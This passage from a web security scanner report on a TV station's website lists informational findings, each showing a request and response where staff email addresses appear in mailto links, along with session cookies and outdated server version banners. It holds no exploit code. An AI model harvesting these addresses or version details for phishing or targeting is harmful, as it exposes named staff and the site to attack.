Date: Mon, 24 Jan 2011 21:57:31 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=7056
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 24 Jan 2011 23:54:17 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 16927
Via: 1.1 dfw107006 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>The Dish - Dish: Italian Christmas Eve Feast of 7 fish</title>
<meta name="publisher
...[SNIP]...
<a href="mailto:JParrish@whdh.com">JParrish@whdh.com</a>
...[SNIP]...

24.457. http://www1.whdh.com/features/articles/dish/BO144759/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.whdh.com
Path:   /features/articles/dish/BO144759/

Issue detail

The following email address was disclosed in the response:
  • JParrish@whdh.com

Request

GET /features/articles/dish/BO144759/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:57:30 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=3018
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 24 Jan 2011 22:46:58 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 15479
Via: 1.1 dfw107007 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>The Dish - Dish: Holiday Cocktails at il Casale</title>
<meta name="publisher" conte
...[SNIP]...
<a href="mailto:JParrish@whdh.com">JParrish@whdh.com</a>
...[SNIP]...

24.458. http://www1.whdh.com/features/articles/dish/BO144797/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.whdh.com
Path:   /features/articles/dish/BO144797/

Issue detail

The following email address was disclosed in the response:
  • JParrish@whdh.com

Request

GET /features/articles/dish/BO144797/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:57:30 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=4120
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 24 Jan 2011 23:05:20 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 16093
Via: 1.1 dfw107005 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>The Dish - Amelia's pork tenderloin</title>
<meta name="publisher" content="New Engl
...[SNIP]...
<a href="mailto:JParrish@whdh.com">JParrish@whdh.com</a>
...[SNIP]...

24.459. http://www1.whdh.com/features/articles/dish/BO144833/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.whdh.com
Path:   /features/articles/dish/BO144833/

Issue detail

The following email address was disclosed in the response:
  • FRivera@whdh.com

Request

GET /features/articles/dish/BO144833/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:57:29 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=456
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 24 Jan 2011 22:04:16 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 15228
Via: 1.1 dfw107007 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>The Dish - Dish: Taleggio Mac & Cheese</title>
<meta name="publisher" content="New E
...[SNIP]...
<a href="mailto:FRivera@whdh.com">FRivera@whdh.com</a>
...[SNIP]...

24.460. http://www1.whdh.com/features/articles/hank/BO144372/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.whdh.com
Path:   /features/articles/hank/BO144372/

Issue detail

The following email address was disclosed in the response:
  • mschwager@whdh.com

Request

GET /features/articles/hank/BO144372/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:57:54 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=2987
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 24 Jan 2011 22:46:51 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 19084
Via: 1.1 dfw107003 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Hank Investigates - Money Monday - Car Payments</title>
<meta name="publisher" conte
...[SNIP]...
<a href="mailto:mschwager@whdh.com">mschwager@whdh.com</a>
...[SNIP]...

24.461. http://www1.whdh.com/features/articles/hank/BO144452/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.whdh.com
Path:   /features/articles/hank/BO144452/

Issue detail

The following email address was disclosed in the response:
  • mschwager@whdh.com

Request

GET /features/articles/hank/BO144452/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:57:53 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=7038
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 24 Jan 2011 23:54:22 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 19344
Via: 1.1 dfw107017 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Hank Investigates - Gas Leaks</title>
<meta name="publisher" content="New England Ne
...[SNIP]...
<a href="mailto:mschwager@whdh.com">mschwager@whdh.com</a>
...[SNIP]...

24.462. http://www1.whdh.com/features/articles/hank/BO144489/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.whdh.com
Path:   /features/articles/hank/BO144489/

Issue detail

The following email address was disclosed in the response:
  • mschwager@whdh.com

Request

GET /features/articles/hank/BO144489/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:57:52 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=2985
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 24 Jan 2011 22:46:47 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 18713
Via: 1.1 dfw107006 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Hank Investigates - Baby Monitors</title>
<meta name="publisher" content="New Englan
...[SNIP]...
<a href="mailto:mschwager@whdh.com">mschwager@whdh.com</a>
...[SNIP]...

24.463. http://www1.whdh.com/features/articles/hank/BO144588/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.whdh.com
Path:   /features/articles/hank/BO144588/

Issue detail

The following email address was disclosed in the response:
  • MSchwager@whdh.com

Request

GET /features/articles/hank/BO144588/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:57:52 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=7039
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 24 Jan 2011 23:54:21 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 20268
Via: 1.1 dfw107022 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Hank Investigates - Asbestos in Schools</title>
<meta name="publisher" content="New
...[SNIP]...
<a href="mailto:MSchwager@whdh.com">MSchwager@whdh.com</a>
...[SNIP]...

24.464. http://www1.whdh.com/features/articles/hiller/BO144771/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.whdh.com
Path:   /features/articles/hiller/BO144771/

Issue detail

The following email address was disclosed in the response:
  • mboudo@whdh.com

Request

GET /features/articles/hiller/BO144771/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:57:40 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=7048
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 24 Jan 2011 23:54:17 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 16330
Via: 1.1 dfw107007 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>The Hiller Instinct - Pay cut for MA lawmakers</title>
<meta name="publisher" conten
...[SNIP]...
<a href="mailto:mboudo@whdh.com">mboudo@whdh.com</a>
...[SNIP]...

24.465. http://www1.whdh.com/features/articles/hiller/BO144776/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.whdh.com
Path:   /features/articles/hiller/BO144776/

Issue detail

The following email address was disclosed in the response:
  • Mboudo@whdh.com

Request

GET /features/articles/hiller/BO144776/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:57:40 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 1
Cache-Control: max-age=2991
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 24 Jan 2011 22:46:41 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 17215
Via: 1.1 dfw107007 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>The Hiller Instinct - Governor Pre-Inaugural Interview</title>
<meta name="publisher
...[SNIP]...
<a href="mailto:Mboudo@whdh.com">Mboudo@whdh.com</a>
...[SNIP]...

24.466. http://www1.whdh.com/features/articles/hiller/BO144796/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.whdh.com
Path:   /features/articles/hiller/BO144796/

Issue detail

The following email address was disclosed in the response:
  • MBoudo@whdh.com

Request

GET /features/articles/hiller/BO144796/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:57:37 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=2979
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 24 Jan 2011 22:46:26 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 16472
Via: 1.1 dfw107022 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>The Hiller Instinct - Hiller - Inauguration</title>
<meta name="publisher" content="
...[SNIP]...
<a href="mailto:MBoudo@whdh.com">MBoudo@whdh.com</a>
...[SNIP]...

24.467. http://www1.whdh.com/features/articles/hiller/BO144813/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.whdh.com
Path:   /features/articles/hiller/BO144813/

Issue detail

The following email address was disclosed in the response:
  • MBoudo@whdh.com

Request

GET /features/articles/hiller/BO144813/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:57:36 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=7050
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 24 Jan 2011 23:54:16 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 16487
Via: 1.1 dfw107017 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>The Hiller Instinct - Arizona Massacre</title>
<meta name="publisher" content="New E
...[SNIP]...
<a href="mailto:MBoudo@whdh.com">MBoudo@whdh.com</a>
...[SNIP]...

24.468. http://www1.whdh.com/features/articles/hiller/BO144841/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.whdh.com
Path:   /features/articles/hiller/BO144841/

Issue detail

The following email address was disclosed in the response:
  • JSavio@whdh.com

Request

GET /features/articles/hiller/BO144841/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:57:34 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=7052
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 24 Jan 2011 23:54:16 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 17479
Via: 1.1 dfw107002 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>The Hiller Instinct - One on One with Senator Scott Brown</title>
<meta name="publis
...[SNIP]...
<a href="mailto:JSavio@whdh.com">JSavio@whdh.com</a>
...[SNIP]...

24.469. http://www1.whdh.com/features/articles/holiday_helping/BO144709/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.whdh.com
Path:   /features/articles/holiday_helping/BO144709/

Issue detail

The following email address was disclosed in the response:
  • KHenry@whdh.com

Request

GET /features/articles/holiday_helping/BO144709/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:57:48 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=7042
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 24 Jan 2011 23:54:20 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 15382
Via: 1.1 dfw107017 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Holiday Helping - 2010 -- Matt Lorch</title>
<meta name="publisher" content="New Eng
...[SNIP]...
<a href="mailto:KHenry@whdh.com">KHenry@whdh.com</a>
...[SNIP]...

24.470. http://www1.whdh.com/features/articles/holiday_helping/BO144719/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.whdh.com
Path:   /features/articles/holiday_helping/BO144719/

Issue detail

The following email address was disclosed in the response:
  • KHenry@whdh.com

Request

GET /features/articles/holiday_helping/BO144719/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:57:48 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=2980
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 24 Jan 2011 22:46:38 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 15405
Via: 1.1 dfw107006 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Holiday Helping - 2010 -- Frances Rivera</title>
<meta name="publisher" content="New
...[SNIP]...
<a href="mailto:KHenry@whdh.com">KHenry@whdh.com</a>
...[SNIP]...

24.471. http://www1.whdh.com/features/articles/holiday_helping/BO144727/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.whdh.com
Path:   /features/articles/holiday_helping/BO144727/

Issue detail

The following email address was disclosed in the response:
  • KHenry@whdh.com

Request

GET /features/articles/holiday_helping/BO144727/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:57:42 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=7046
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 24 Jan 2011 23:54:18 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 15405
Via: 1.1 dfw107002 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Holiday Helping - 2010 -- Larry Ridley</title>
<meta name="publisher" content="New E
...[SNIP]...
<a href="mailto:KHenry@whdh.com">KHenry@whdh.com</a>
...[SNIP]...

24.472. http://www1.whdh.com/features/articles/holiday_helping/BO144733/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.whdh.com
Path:   /features/articles/holiday_helping/BO144733/

Issue detail

The following email address was disclosed in the response:
  • KHenry@whdh.com

Request

GET /features/articles/holiday_helping/BO144733/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:57:40 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=2979
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 24 Jan 2011 22:46:29 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 15401
Via: 1.1 dfw107022 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Holiday Helping - 2010 -- Anne Allred</title>
<meta name="publisher" content="New En
...[SNIP]...
<a href="mailto:KHenry@whdh.com">KHenry@whdh.com</a>
...[SNIP]...

24.473. http://www1.whdh.com/includes/elements/accordion_whdh-senditto7

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.whdh.com
Path:   /includes/elements/accordion_whdh-senditto7

Issue detail

The following email address was disclosed in the response:
  • senditto7@whdh.com

Request

GET /includes/elements/accordion_whdh-senditto7 HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:57:21 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Location: accordion_whdh-senditto7.php
Vary: negotiate
TCN: choice
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Cache-Control: max-age=28800
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Tue, 25 Jan 2011 05:56:31 GMT
Content-Type: text/html; charset=ISO-8859-1
Via: 1.1 dfw107007 (MII-APC/1.6)
Connection: close
Content-Length: 4266

<!-- cached --><div style='padding:8px;border-bottom:1px solid #cfcfcf;background:#f0f0f0;'>
<h4 style='margin-bottom:7px;'>Your Photos Sent to 7</h4><a href="http://www1.whdh.com/slideshows/view/View
...[SNIP]...
<a href="mailto:senditto7@whdh.com">senditto7@whdh.com</a>
...[SNIP]...

24.474. http://www1.whdh.com/includes/elements/accordion_whdh-storyideas

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.whdh.com
Path:   /includes/elements/accordion_whdh-storyideas

Issue detail

The following email address was disclosed in the response:
  • newstips@whdh.com

Request

GET /includes/elements/accordion_whdh-storyideas HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:57:24 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Location: accordion_whdh-storyideas.php
Vary: negotiate
TCN: choice
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Cache-Control: max-age=600
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
